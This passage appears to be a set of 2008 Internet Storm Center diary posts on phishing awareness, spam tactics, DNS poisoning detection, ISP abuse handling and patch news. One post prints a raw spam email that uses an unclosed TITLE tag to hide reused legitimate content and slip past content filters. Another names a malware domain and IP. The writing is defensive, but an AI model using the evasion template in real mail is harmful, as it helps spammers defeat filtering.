  • if the email asks you to click a link to “verify” personal details. e.g. “please click the link below to verify your account details”.
  • the link looks funny.  e.g. http://123.123.123.123/dhjeuaUhskw/special_surprise or www.notquite-the-banks-name.com
  • the web page says you have
    • “won a laptop, click here to claim”,
    • “a /spyware, click here to download a program to fix it”,
    • “been selected as our lucky winner for .....”

If you have passed all of the above tests and you succumb to the urge to click, then before you click ask yourself some additional questions:

  • How certain am I that the email was sent by the sender?
  • Does the link match what I would expect it to be?  e.g.  www.xyzstore.com rather than www.xyzzstore.com
  • When you hover the cursor over the link, where does the browser say it will take you?  e.g. Hover your mouse over the following link http://www.xyzstore.com  would this link take you somewhere “special”.

So these are some of the examples I could think off to help educate my users.  If you have some that I can add, please send them in.

As for system admins and security folks, in the next three weeks you might want to make sure that your AV is up to date.  Your SPAM engines are working properly, web traffic is filtered and you watch your logs for connections to weird places.  Keeping in mind that until August 24 some parts of China are not going to be weird places.   You might even consider doing what I have done at a few sites, which is to whitelist the official Olympic sites and block the rest. 

Just to get into the spirit of things,  Go Aussie Go! (and Kiwi’s too).  ;-)

Cheers

Mark H - Shearwater

0 Comments

Published: 2008-08-06

When spammers use your own e-mails

Some time ago, one of our readers, Mike S, sent an e-mail with an interesting observation about how spammers used e-mails from one of his customers (this has been actually sitting in my own inbox for way too long).

The e-mails contained all "standard" elements such as spoofed headers etc, but there was a very interesting thing with the body content.

As with most e-mail spammers send, these e-mails were HTML as well. However, the interesting part was that the spammers took his clients' e-mails and modified the HTML a bit to include their own message.

The spammers added the link they wanted to spam at the top and then opened a <TITLE> HTML tag. After the TITLE tag came the full original e-mail, but the tag was never actually closed. This resulted in Outlook displaying only the spammed link, but not showing the original e-mail content.

The raw e-mail looked like this:

--AlternativeBoundary.22222222.22222222
Content-Type: text/html; charset="ISO-8859-1"
Content-Transfer-Encoding: 8bit

<html><center><FONT SIZE="5" COLOR="#10566D">Spammers message</font><br><br><A HREF="http://spammers link">http://spammers link</A>
<title><body leftmargin=5 topmargin=5 marginwidth=0 marginheight=0>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=white align=center border=0>
<tr><td style='{font-family: Verdana, sans-serif; color=#7a929f;font-weight:700;font-size: 11px;text-transform : capitalize;}'>
.... ORIGINAL MAIL CONTENT ...
</td></tr>
</table><p>&nbsp;</p>
</body>


Of course, by using the original e-mail content (which was legitimate when the client sent it), the spammers are trying to evade Bayesian filters, and at least in Mike's example they even managed to get SpamAssassin decrease the final score of the e-mail.

In any case, it's an arms race between spammers and content filter developers. Thanks Mike again for sending this interesting information (and sorry it took so long to analyze it).

--
Bojan
 

0 Comments

Published: 2008-08-05

Watching those DNS logs

Among the frantic activity to get all the DNS resolvers patched, very little has been said on how to be on the lookout for DNS poisoning attempts. Irrespective of the attack details, the two possible scenarios seem to be
(1) someone attacks a DNS resolver/forwarder of yours
(2) someone attacks a remote resolver/forwarder to poison a domain you own
The impact of the first scenario would be to draw your own users from, say, google.com to an evil incarnation instead. The impact of the second scenario would be that a customer of yours somewhere else on the world can no longer get to your services and is being redirected to or through an evil third party. The first scenario is what you patched your resolvers against - for the second scenario, you have to hope that all your customers are patched. If you are, for example, a retail bank with a nationwide online presence, chances are that not all your clients (or rather their ISPs) are patched and safe.

From the attack details that have so far been disclosed, scenario (2) involves a high number of queries for bogus names in the domain that you own. Your authoritative DNS server will respond with "NXDOMAIN" (no such domain) to all these requests, but every such query provides the attacker with a chance to inject a bogus reply to poison the querying resolver of your client's ISP.

Emergingthreats.net has a Snort rule (sid:2008470) to catch an excessive number of NXDOMAIN replies received by your resolver. This covers scenario (1). Scenario (2) would require a way to watch for a high number NXDOMAIN answers sent by your own authoritative DNS server. A quick check we made turned out that neither BIND9 nor MS-DNS seem to offer any easy way to log NXDOMAIN answers of your DNS server without going into debug-dump-it-all mode. The statistics collected by BIND keep track of sent NXDOMAIN records in the "SNXD" counter, but that's about it.

If you have any good suggestions on how to watch for a high number of queries for nonexisting hosts in your domain, or for a high number of NXDOMAIN replies leaving your DNS server, please let us know.
 

2 Comments

Published: 2008-08-05

The news update you never asked for

If you missed last week's chance to get your "airplane ticket", you currently have a second opportunity. Emails are making the rounds that claim to come from CNN, and carry a subject of "CNN.com Daily Top 10". Well, they are neither. But the emails contain click-friendly headlines with enticing subjects like "Will all Americans be obese by 2030?" Now who wouldn't want to read THAT?!

Clicking takes you to the netherworld, of course. You currently receive a file called "get_flash_update.exe" (yeah, sure!). Detection for the sample is coming on line, see http://www.virustotal.com/analisis/258fbdfb7eb6ecfedbf236533b03c945

The domain "idoo .com" seems to be up to no good. Other involved domains are too numerous to listen, but about 50 of them currently resolve to 200.46.83.233.  That's in Panama.

3 Comments

Published: 2008-08-04

isc.sans.org vs. isc.org

Over the last weeks, with all the attention focused on DNS, we have seen a couple of news articles mistaking us (Internet Storm Center) for isc.org (Internet Systems Consortium). Sadly, yet another reminder about how careless some of these articles are researched.

On the plus site: I don't remember seeing a single reader request for BIND patches ;-). I guess our readers are a bit smarter.

A number of security and IT/Networking related organizations use the acronym "ISC". For example ISC^2, the company behind the CISSP ceritfication. There is also an ISC conference dealing with physical security and an "Information Security Comittee" of the American Bar Association. Neither organization has any affiliation with us or as far as I can tell, isc.org.

If there is a possibility to confuse us with other ISCs, I typically try to use "SANS ISC" to clarify.

Just as a sidenote: Our first choice for a name was actually "Internet Storm Watch". At the time a company called Okena (now acquired by Cisco) sold an intrusion detection product called "Storm Watch". They asked us not to use the name "Internet Storm Watch". Luckily this happened before we used that name much and it was easy to change.

So for your BIND patches (and a lot of other good stuff), continue to go to www.isc.org.

 

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

0 Comments

Published: 2008-08-03

Securing A Network - Lessons Learned

 

A few months ago I took over the Abuse Department for a small ISP in the Midwest.  Little did I realize when they asked me to take the abuse that it was really me that was going to be abused.  From disgruntled customers to disgruntled service providers I have dealt with them all.  Prior to taking on this responsibility I wondered why it was that there was so much spam, why is it that ISP’s aren’t taking control of the situation, why it can’t be stopped, after all how hard could it be.  I now understand, I totally get it.  For those who have never had to deal with the cleanup, have never had to deal with the customers who don’t understand the correlation between spam, viruses, and P2P programs, let me tell you it hasn’t been easy.  In this diary I am going to outline some of the lessons that I have learned and hope that some of you will share your lessons learned with us.

Lesson 1 – Your logs and Log reports can be your most valuable tool and can give you an advanced warning of mail server abuse.  We have a lot of servers and many of them are email servers.  I monitor the log files daily to look for any obvious problems.  I have been amazed at how many times I have detected a problem simply by looking at the logs.  We currently are using Logwatch Reporting.  The summarization in these reports is pretty good.  However, having to look at a report for each server does take a bit of time.  I am reviewing different Log Management programs right now looking for a way to simplify or consolidate the information. I have decided that this may well be my first line of defense.

 

Lesson 2 – Customer computer’s without anti-virus and/or firewall protection are a big target, not just for them but for their ISP as well.  It absolutely amazed me how quickly a computer can go from compromised to abused and used.  Over the July 4th weekend while reviewing my logs I noticed that one of our IP addresses, a residential customer’s home computer was sending over 200,000 emails a day.  I quickly blocked the IP and determined who the customer was. In my conversation with the customer I asked them if they had an anti-virus program.  They said that they did, when I asked them how long ago they had purchased the license, they couldn’t remember.  It came with their computer and they bought their computer a few years ago.  They said that they updated it everyday. I explained to them that it has to be renewed every year.  They had no idea. It amazes me that people have no idea what it takes to protect their computer and perhaps their identity as well. 

 

Lesson 3 – A mail server, no matter how well protected is in danger of being blocklisted. And once blocklisted it is really hard to get it off the list.  As I indicated our customer over the 4th of July weekend with a compromised computer was sending massive amounts of spam.  As soon as I discovered it I stopped the activity, however it was already too late.  The server had been blocklisted.  I attempted to contact the blocklists but found it literally impossible to do.  It took the best part of 3 days to get every thing returned to normal.  In the meantime, I had to deal with customers who were trying to send email's and they were unable to do so. They were angry and didn't understand that it is virtually out of my hands.  Once the blocklist is there, you are at the mercy of the listers. I really wish that there was a process or a better way to resolve these issues.

 

Lesson 4 – Many of our customers whose IP addresses have been identified with spamming have had 2 components in common.  They either had outdated anti-virus programs/or using free anti-virus programs and/or they were using programs to download music/movies from the Internet.  Many of the customers that had the music/movie programs had no idea that these programs were installed on the computer. (They had teenager computer users).  The ones that knew that the programs were there had no idea about the security risks that these programs created for their computer.  It amazes me how little people know about the programs or files installed on their computers.  They download that cute screen-saver or wallpaper program not realizing that they have just installed spyware or smutware, thus opening up their computer to the world of the bad guys.

 

Lesson 5 – We have had a few instances where our small business customers had put up web servers or email servers.  They either had bad advice given to them or they used out of box solutions and their web servers/mail servers had been compromised.  In one case they had been hosting a paypal phishing site.  When I contacted them, they did not even know that they had a web server running.  Upon investigation they discovered that not only was the web server service running (and not being used) but users had been installed on their server.  The bad guys were doing a bit more than hosting a paypal site.

 

At SansFire this year, one of the Sans@Night events was a panel discussion – Meet the Handler’s. A question came up about the education of the small business/home computer user and whose responsibility it was. One of the guests in the audience didn’t feel that it should be an IT responsibility.  I said then and I will say it again.  It is our responsibility and is to our benefit.  If we help to educate the end user, help them to understand the impact they have on the rest of the customers served by their Company, their ISP and the Internet, the ultimate outcome will be a better cleaner Internet for everyone.  A little education may result in increased understanding of the importance of firewalls and anti-virus/anti-spyware programs and OS updates which will lead to increased use of these programs.  The increased use of these programs will inevitably lead to the fewer compromised computers, fewer Botnets, and fewer security holes.

 

Who better to reach out to our communities, to our families and friends then those of us who know and understand? A little education may go a long way.

 

Let us know what you think?  What lessons have you learned? 

1 Comments

Published: 2008-08-02

Issues affecting sites using Sitemeter [resolved]

We received several reports (thanks Thanos and Jim) of sites which use the Sitemeter visitor counter that were no longer loading as of last night for users with Internet Explorer 7.

It appears that during a development update of SiteMeter, their team did not take into account a known bug in this version of the browser which does not allow modification of a parent container using scripts in one of its childs (using either the innerHTML or appendChild method). This causes the browser to stop loading the site, returning an "Operation aborted" message.

SiteMeter has now resolved the issue and published a blog entry explaining what happened. Just as with advertisement providers and the republishing of RSS feeds, it's an interesting example of how dependent our sites have become on third party code and the potential impact.

0 Comments

Published: 2008-08-02

BIND: -P2 patches are released

As expected, the Internet Systems Consortium released patches today addressing stability and performance issues some of those having significant load on their systems were struggling with.

Happy patching!

--
Swa Frantzen -- Section 66

0 Comments

Published: 2008-08-02

A little of that human touch

Several times each week, the Internet Storm Center is requested to broker between parties who have found vulnerabilities, and the corresponding vendors of the software or services affected. While we're always happy to assist, the reason for our involvement has much less to do with animosity between both parties than with the availability of either one of them.

Many accidental finders of a security problem bump into issues when trying to report it to the vendor of the software or service. The last thing someone reporting an issue wishes to do is to spend twenty minutes logging a support case, only to be halted when they are requested for a serial number. There are situations in which a non-direct client may have become aware of a security issue in your product. Even in that case, you *really* want to know.

If you're a software vendor or services company, please take some time today to ensure you have security contacts listed on your public portals. It's always a good idea to ensure these details are known to organizations such as CERT, oCERT, the Storm Center and public resources such as the open vendor database at OSVDB. Nothing beats making it clearly visible on your site, where it's trivial for everyone to find.

Cheers,
Maarten

0 Comments

Published: 2008-08-01

Microsoft Malicious Software Removal Tool users double check it's running

A reader (thanks Joe D.) shared with us his recent experience with the Microsoft Windows Malicious Software Removal Tool after the latest update (July).


The tool requires administrative privileges during the initial installation, but can then run as an unprivileged user from then on after accepting the license agreement.

From the release notes:
"You must accept the Microsoft Software License Terms. The license terms are only displayed for the first time that you access Automatic Updates.

Note After you accept the one-time license terms, you can receive future versions of the Malicious Software Removal Tool without being logged on to the computer as an administrator."

It appears that some component of the Agreement may have changed in this latest update which will require an Admin user to launch the tool and accept the new agreement. Some users may not be aware of this and be under the false impression the tool is running on a schedule as expected.

So now would be a good time to double check that the Malicious Software Removal Tool is in fact running on your machine(s) as expected. In fact now is a good time to review any security software in general that is expect/required to be running on your systems to determine it is in fact running. Any number of updates, misconfigurations, network huffage, or even better/worse malicious action could have disabled various programs or prevented them from running.

Many flavors of malware will search for and shutdown or disable most of the common personal firewall, anti-virus/anti-spyware tools. Or even more difficult to audit are those malicious programs which simply modify the firewall settings to allow the ports they need open.

Here is the link to details on the tool:

http://support.microsoft.com/?kbid=890830

This KB has some useful information for determining the tool is running (especially in a large environment):

http://support.microsoft.com/kb/891716/

Excerpt:
"A2. You can examine the value data for the following registry entry to verify the execution of the tool. You can implement such an examination as part of a startup script or a logon script. This process prevents the tool from running multiple times.

Subkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RemovalTools\MRT
Entry name: Version

Every time that the tool is run, the tool records a GUID in the registry to indicate that it has been executed. This occurs regardless of the results of the execution."

So for the lastest update the GUID is:

July 2008    BC308029-4E38-4D89-85C0-8A04FC9AD976

This may also help determine that the tool is being updated.

Robert
ISC Handler on Duty

1 Comments

Published: 2008-08-01

Apple's Security Update 2008-005: DNS workaround finally included

Apple released their patch overnight (depending on your timezone of course).

Most importantly it contains the workaround for the DNS bug CVE-2008-1447. Also included is an upgrade to PHP 5.2.6 (which was released in source code at www.php.net on May 1st). Seems we all need to urge Job's gang to release patches significantly faster: it's the price to pay to base parts of your system on open source code.

Apple Mac OS X users get it though software update. As always it's one big patch, given that little choice,  you'll want to PATCH NOW.

--
Swa Frantzen -- Section 66

0 Comments